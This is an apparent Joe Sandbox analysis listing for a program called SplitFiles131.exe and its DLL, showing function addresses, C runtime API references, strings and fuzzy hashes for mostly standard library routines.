Function 00440E98 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00440EAE
_free.LIBCMT ref: 00440EBA
_free.LIBCMT ref: 00440EC5
_free.LIBCMT ref: 00440ED0
_free.LIBCMT ref: 00440EDB
_free.LIBCMT ref: 00440EE6
_free.LIBCMT ref: 00440EF1
_free.LIBCMT ref: 00440EFC
_free.LIBCMT ref: 00440F07
_free.LIBCMT ref: 00440F15

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: db551eddc28ed9585e28f7d8a930085c69e0a83f508d5c587fb4fce91d87a741
Instruction ID: b5acc537e47175a484598864f7b5fa9eab7981bf784aec42cf186d38ae6ea6e0
Opcode Fuzzy Hash: db551eddc28ed9585e28f7d8a930085c69e0a83f508d5c587fb4fce91d87a741
Instruction Fuzzy Hash: 9821B67690010CBFDF41EF96C881DDE7BB8AF08344F0081AAF6159B121DB35EA958B88

Uniqueness

Uniqueness Score: -1.00%

Function 10007A68 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 10007A7E

Part of subcall function 10008701: RtlFreeHeap.NTDLL(00000000,00000000,?,100074AC), ref: 10008717
Part of subcall function 10008701: GetLastError.KERNEL32(?,?,100074AC), ref: 10008729

_free.LIBCMT ref: 10007A8A
_free.LIBCMT ref: 10007A95
_free.LIBCMT ref: 10007AA0
_free.LIBCMT ref: 10007AAB
_free.LIBCMT ref: 10007AB6
_free.LIBCMT ref: 10007AC1
_free.LIBCMT ref: 10007ACC
_free.LIBCMT ref: 10007AD7
_free.LIBCMT ref: 10007AE5

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 81c439588ecf3f878c2d47a34354f57c6a02997bda065798a73a88b2c9937e33
Instruction ID: 867ad9f989b00400d9638a76b2324434a93f572cdeb18d7cd5bb1e105d022b7d
Opcode Fuzzy Hash: 81c439588ecf3f878c2d47a34354f57c6a02997bda065798a73a88b2c9937e33
Instruction Fuzzy Hash: 8321957A914108EFDB41DF94C841DDE7BB9FF08384B6081A6F9599B125EA32EA448F90

Uniqueness

Uniqueness Score: -1.00%

Function 10001F90 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 342COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,D0547283,?,?), ref: 1000201A
CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000001), ref: 100021C1
GetLastError.KERNEL32 ref: 100021CF
GetTempPathA.KERNEL32(00000104,?), ref: 100021EC
CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000001), ref: 10002389
GetLastError.KERNEL32 ref: 10002393

Strings

APPDATA, xrefs: 10002043
TMPDIR, xrefs: 10002213

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: CreateDirectoryErrorLastPath$FolderTemp
String ID: APPDATA$TMPDIR
API String ID: 519037321-4048745339
Opcode ID: 2df08be5817bc88c7724805b3209b62b20567340b0953353b922b6276f4cf695
Instruction ID: 73a1d6a44cef61f255837fd76ca3bed7767395f6b845790b902de768a736ecff
Opcode Fuzzy Hash: 2df08be5817bc88c7724805b3209b62b20567340b0953353b922b6276f4cf695
Instruction Fuzzy Hash: 41D1B271A042589FFB25CB24CC88B9DB7B5EF45340F1082D8E44AA7299D775AB84CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0042ADB1 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042BA9F), ref: 0042ADCA

Strings

asin, xrefs: 0042AEF7
log, xrefs: 0042AE27, 0042AE36
exp, xrefs: 0042AE49, 0042AEAE
sqrt, xrefs: 0042AF09
log10, xrefs: 0042AE0C, 0042AE1B
acos, xrefs: 0042AF00
pow, xrefs: 0042AE68, 0042AF12, 0042AF5F

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 26b296a4fed531b61828374a93348b370b4dc10c97bd2c2867f99b54bc7a72f6
Instruction ID: 9a0aa79b74204bca965e26bff41110038d07c872e789de07625a36b1bd30ca62
Opcode Fuzzy Hash: 26b296a4fed531b61828374a93348b370b4dc10c97bd2c2867f99b54bc7a72f6
Instruction Fuzzy Hash: CC5180B0A0052ACBCB148F99FA4C1AEBB74FB08304F964087EC51A7254C77C89768B5F

Uniqueness

Uniqueness Score: -1.00%

Function 00425B4F Relevance: 13.7, APIs: 9, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00425BBD
_free.LIBCMT ref: 00425BC9
_free.LIBCMT ref: 00425CF2
_free.LIBCMT ref: 00425CFD

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1adb941b9abc843823b6cecc210d72ab4751bd57d712c87c9e49a8cfc94ca12c
Instruction ID: c7266049f18fbd2a82f263cfe4493866a99ee9702eead5b57a4a5b9491e875f7
Opcode Fuzzy Hash: 1adb941b9abc843823b6cecc210d72ab4751bd57d712c87c9e49a8cfc94ca12c
Instruction Fuzzy Hash: 34611671A007159FEB20DF66E841BABB7F8AF44314FA0456FE945EB381E774AC408B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040C590 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C5D9
std::_Lockit::_Lockit.LIBCPMT ref: 0040C5FB
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C61B
__Getctype.LIBCPMT ref: 0040C6B1
std::_Facet_Register.LIBCPMT ref: 0040C6D0
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C6E8

Strings

B@, xrefs: 0040C6AB

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID: B@
API String ID: 1102183713-1939862501
Opcode ID: 3bfcd95a1d60704c14d7630784b95f2b5bd9d64dce3bb454e3c0f79256cf6333
Instruction ID: 6ac1ce246c7cb2948fc285676951677c035abaaa7204644bef92127c1cfd88d1
Opcode Fuzzy Hash: 3bfcd95a1d60704c14d7630784b95f2b5bd9d64dce3bb454e3c0f79256cf6333
Instruction Fuzzy Hash: 8541AF71900214CBCB20DF55D881BAEB7B4EB14714F144A7EE846B7382DB3AAD05CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00424C14 Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00424C3E
_free.LIBCMT ref: 00424D17
_free.LIBCMT ref: 00424D44

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 4e14be396917b90d40ada6c8054fde6103272dd0e98e2066e88c24aaefcf9db6
Instruction ID: c24dd6349b25f5b46de012d200697a2dc7ab1927184a9c428c04661f96352079
Opcode Fuzzy Hash: 4e14be396917b90d40ada6c8054fde6103272dd0e98e2066e88c24aaefcf9db6
Instruction Fuzzy Hash: CB510E70B04321AFEB21BF75A851ABE7BE8EF81314F81416FE91497281DB3D85418B5D

Uniqueness

Uniqueness Score: -1.00%

Function 1000A62A Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 1000A654
_free.LIBCMT ref: 1000A72D
_free.LIBCMT ref: 1000A75A

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: a0c36db041c6394aca0add2f8b723cd2806df39da9a9d26740de4ca1c8323699
Instruction ID: 381467da00f9b5958bd928ec2253f49b5b741610b1117f8a7471ff7dbb655abb
Opcode Fuzzy Hash: a0c36db041c6394aca0add2f8b723cd2806df39da9a9d26740de4ca1c8323699
Instruction Fuzzy Hash: 5F51F475904212AFFB10DF788C81A5E7BF4FF063D0B11826DE9149718AEB72DA81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9D5 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0040EA1E
__alloca_probe_16.LIBCMT ref: 0040EA4A
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0040EA89
LCMapStringEx.KERNEL32 ref: 0040EAA6
LCMapStringEx.KERNEL32 ref: 0040EAE5
__alloca_probe_16.LIBCMT ref: 0040EB02
LCMapStringEx.KERNEL32 ref: 0040EB44
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040EB67

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: dbe60554392ac3eae939534d336e4110778e17a30d238082d0c9db6a49dad1a4
Instruction ID: bae1dc4957788a08111944ff1eaf9dbc1280390a613fb653b58dfa13e10e978f
Opcode Fuzzy Hash: dbe60554392ac3eae939534d336e4110778e17a30d238082d0c9db6a49dad1a4
Instruction Fuzzy Hash: 6351A172600205ABEF209F62CC45FAB7BB9EB44750F15483AFD05A62D0D778ED21CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041BEFC Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041CB63: GetLastError.KERNEL32(?,?,?,00413661,?,00000000,00405D9E,?,00418194,?,00000000,76686490,?,0041828D,00405D9E,00000000), ref: 0041CB68
Part of subcall function 0041CB63: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00418194,?,00000000,76686490,?,0041828D,00405D9E,00000000,?,00405D9E,?), ref: 0041CC06

_free.LIBCMT ref: 0041C1E7
_free.LIBCMT ref: 0041C200
_free.LIBCMT ref: 0041C23E
_free.LIBCMT ref: 0041C247
_free.LIBCMT ref: 0041C253

Strings

C, xrefs: 0041C058

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: db53cc3fb368b299e4ebc727ca1c17a56f226d76f8d2124a3b5b37d9cb2993de
Instruction ID: ef45604bd07060d4e86bdf097be434cf7ae4fa59a7229b5fd9910e1095f225e5
Opcode Fuzzy Hash: db53cc3fb368b299e4ebc727ca1c17a56f226d76f8d2124a3b5b37d9cb2993de
Instruction Fuzzy Hash: 19B13775A412199BDB24DF59CC84AEAB7B4FB48304F5045AEE809A7391D734AED0CF88

Uniqueness

Uniqueness Score: -1.00%

Function 00421202 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00421286
__alloca_probe_16.LIBCMT ref: 0042134C
__freea.LIBCMT ref: 004213B8

Part of subcall function 0041ED2F: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041ED61

__freea.LIBCMT ref: 004213C1
__freea.LIBCMT ref: 004213E4

Strings

tIB, xrefs: 00421214

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID: tIB
API String ID: 1423051803-366005614
Opcode ID: 8bcbbfb6db70486236c34e29ace3ccf3bdd9e9482cebc72fef7cc3ecca7d4215
Instruction ID: af5f65ccc48ee5d63aac88402d645400baba8313a5c2bd7b01ea6e1089fcebf7
Opcode Fuzzy Hash: 8bcbbfb6db70486236c34e29ace3ccf3bdd9e9482cebc72fef7cc3ecca7d4215
Instruction Fuzzy Hash: E8511472700226ABEF209E55EC41FBF36AADF60754F64016BFC04E6260E73CDD5186A8

Uniqueness

Uniqueness Score: -1.00%

Function 100033D6 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 1000341D
___scrt_uninitialize_crt.LIBCMT ref: 10003437

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: fb96ed7170912c531198425769cf64f804bb219cb4c682d5ecc3c1bbbb0e391b
Instruction ID: f2d724fec1a198361f11823c952c0a5602674603fef4946e569f0555ef38e7cd
Opcode Fuzzy Hash: fb96ed7170912c531198425769cf64f804bb219cb4c682d5ecc3c1bbbb0e391b
Instruction Fuzzy Hash: CB41C372D04A65ABFB13CF64CC42B9F7BACEB446D2F11C119F8446A269D730AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 0043EA60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0043EA97
___except_validate_context_record.LIBVCRUNTIME ref: 0043EA9F
_ValidateLocalCookies.LIBCMT ref: 0043EB28
__IsNonwritableInCurrentImage.LIBCMT ref: 0043EB53
_ValidateLocalCookies.LIBCMT ref: 0043EBA8

Strings

csm, xrefs: 0043EB3D

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 97abf38324731e32aa54c8af95c8715b679c63eee41a74b9c7ea5a5f1bcbe85c
Instruction ID: 56324905b5cf03f36623b407c9bca58900183bbae34251306b30c85aa47bf572
Opcode Fuzzy Hash: 97abf38324731e32aa54c8af95c8715b679c63eee41a74b9c7ea5a5f1bcbe85c
Instruction Fuzzy Hash: A941EB30A01208EBCF10DF6AC885A9EBBB1FF4C318F14915AE8155B3D2C779E911CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00411BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00411C17
___except_validate_context_record.LIBVCRUNTIME ref: 00411C1F
_ValidateLocalCookies.LIBCMT ref: 00411CA8
__IsNonwritableInCurrentImage.LIBCMT ref: 00411CD3
_ValidateLocalCookies.LIBCMT ref: 00411D28

Strings

csm, xrefs: 00411CBD

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e0701a756b8fd532e6c54edd9633cc2f37b64c963fcb2cfba846efdf3320919d
Instruction ID: bee35b64c31f227da84885fae90110515caed0ba2fa3c8c6cd36066413939370
Opcode Fuzzy Hash: e0701a756b8fd532e6c54edd9633cc2f37b64c963fcb2cfba846efdf3320919d
Instruction Fuzzy Hash: 81412B30E002089BCF10DF69C880ADEBBB1EF05318F54805BEA149B361E779DA95CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 10004510 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 10004547
___except_validate_context_record.LIBVCRUNTIME ref: 1000454F
_ValidateLocalCookies.LIBCMT ref: 100045D8
__IsNonwritableInCurrentImage.LIBCMT ref: 10004603
_ValidateLocalCookies.LIBCMT ref: 10004658

Strings

csm, xrefs: 100045ED

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 71993e02da73fe6ea8203d8663dbfd28e3c5aac2b87050cf1c64cbd4c7b0a4a1
Instruction ID: e65ff753308d278a6817090cc45740b4f84ab4a7cb3d59c0f71bc0a74e6c746d
Opcode Fuzzy Hash: 71993e02da73fe6ea8203d8663dbfd28e3c5aac2b87050cf1c64cbd4c7b0a4a1
Instruction Fuzzy Hash: 4141C378E00218EBEF00CF68CC84A9E7BF5EF452A5F118055E8149B356DB72EA11CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00424203 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Program Files (x86)\Split Files\SplitFiles131.exe, xrefs: 00424208
VCB, xrefs: 00424254

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Program Files (x86)\Split Files\SplitFiles131.exe$VCB
API String ID: 0-2544648200
Opcode ID: 69ef0a19d16ed832991be1ac6899432db3f95619588f9b7e4da384f3d8da2b51
Instruction ID: ff3a756bc587a2ce23644913c84b3eb2307a4a6ea4fbf3a266a3dc89f95f590a
Opcode Fuzzy Hash: 69ef0a19d16ed832991be1ac6899432db3f95619588f9b7e4da384f3d8da2b51
Instruction Fuzzy Hash: FB21F231300225FF9B20AF63EC40E6B739DEF807A8751465AF91597241E738ED818778

Uniqueness

Uniqueness Score: -1.00%

Function 0041E4C8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 0041E51F
ext-ms-, xrefs: 0041E533

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: f5ec6ee9c4a828023a9cd68abdd904a08f9a9bc1d08a35ee3d13f4932bbadbf7
Instruction ID: a070aaca4d8e33c421c8892c34a803ef62d39d78bd865ca4f18396a08a3380d9
Opcode Fuzzy Hash: f5ec6ee9c4a828023a9cd68abdd904a08f9a9bc1d08a35ee3d13f4932bbadbf7
Instruction Fuzzy Hash: 9F21DE39E01220F7D73147679C44A9B3769AF05BA4F550136ED06A7390E638ED41C6DD

Uniqueness

Uniqueness Score: -1.00%

Function 1000800F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 10008066
ext-ms-, xrefs: 1000807A

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 495c40b57803ef5ef3fb5807e2b2eab896702d7168f31e2b001653fa3d16e092
Instruction ID: 90a9feae873bb1b7bb8f48b179cd5688537d64e801fb6ee6e67ba8e33ea3485b
Opcode Fuzzy Hash: 495c40b57803ef5ef3fb5807e2b2eab896702d7168f31e2b001653fa3d16e092
Instruction Fuzzy Hash: BD219675A01221ABF7A2CB248D84A4A3698FB057E0F224655FDC5A7295DB70EE0487E1

Uniqueness

Uniqueness Score: -1.00%

Function 00443054 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0044301C: _free.LIBCMT ref: 00443041

_free.LIBCMT ref: 004430A2
_free.LIBCMT ref: 004430AD
_free.LIBCMT ref: 004430B8
_free.LIBCMT ref: 0044310C
_free.LIBCMT ref: 00443117
_free.LIBCMT ref: 00443122
_free.LIBCMT ref: 0044312D

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 133ea2b89444c130765e51dc6ef272bab715d3be83394f254edc6edf343bbe22
Instruction ID: 18b0f10dc80f86e3b47954cd7ac735c8865c2d37fda3f0ccca68a77a81fef9d4
Opcode Fuzzy Hash: 133ea2b89444c130765e51dc6ef272bab715d3be83394f254edc6edf343bbe22
Instruction Fuzzy Hash: 3F116D31540B04FAFE20FFB2CC07FCB77AC5F05B06F40491EB29966066DA6EEA445699

Uniqueness

Uniqueness Score: -1.00%

Function 00426011 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00425D5D: _free.LIBCMT ref: 00425D82

_free.LIBCMT ref: 0042605F

Part of subcall function 0041E2B8: HeapFree.KERNEL32(00000000,00000000,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?), ref: 0041E2CE
Part of subcall function 0041E2B8: GetLastError.KERNEL32(?,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?,?), ref: 0041E2E0

_free.LIBCMT ref: 0042606A
_free.LIBCMT ref: 00426075
_free.LIBCMT ref: 004260C9
_free.LIBCMT ref: 004260D4
_free.LIBCMT ref: 004260DF
_free.LIBCMT ref: 004260EA

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0ec00478f14c113bf47a4fee4d442575f16bafd0bb01c80a52db30f625d4e359
Instruction ID: b3dbb492fdefcd87f13974c7623e4ee0a28cf06b85d3f0612ad809807c760fc1
Opcode Fuzzy Hash: 0ec00478f14c113bf47a4fee4d442575f16bafd0bb01c80a52db30f625d4e359
Instruction Fuzzy Hash: 5C11B431640B14AAD520B7B2DC0BFCBBB9C5F01344F808D1FF69D660A2EA7CB6408769

Uniqueness

Uniqueness Score: -1.00%

Function 1000BB3C Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 1000BB04: _free.LIBCMT ref: 1000BB29

_free.LIBCMT ref: 1000BB8A

Part of subcall function 10008701: RtlFreeHeap.NTDLL(00000000,00000000,?,100074AC), ref: 10008717
Part of subcall function 10008701: GetLastError.KERNEL32(?,?,100074AC), ref: 10008729

_free.LIBCMT ref: 1000BB95
_free.LIBCMT ref: 1000BBA0
_free.LIBCMT ref: 1000BBF4
_free.LIBCMT ref: 1000BBFF
_free.LIBCMT ref: 1000BC0A
_free.LIBCMT ref: 1000BC15

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

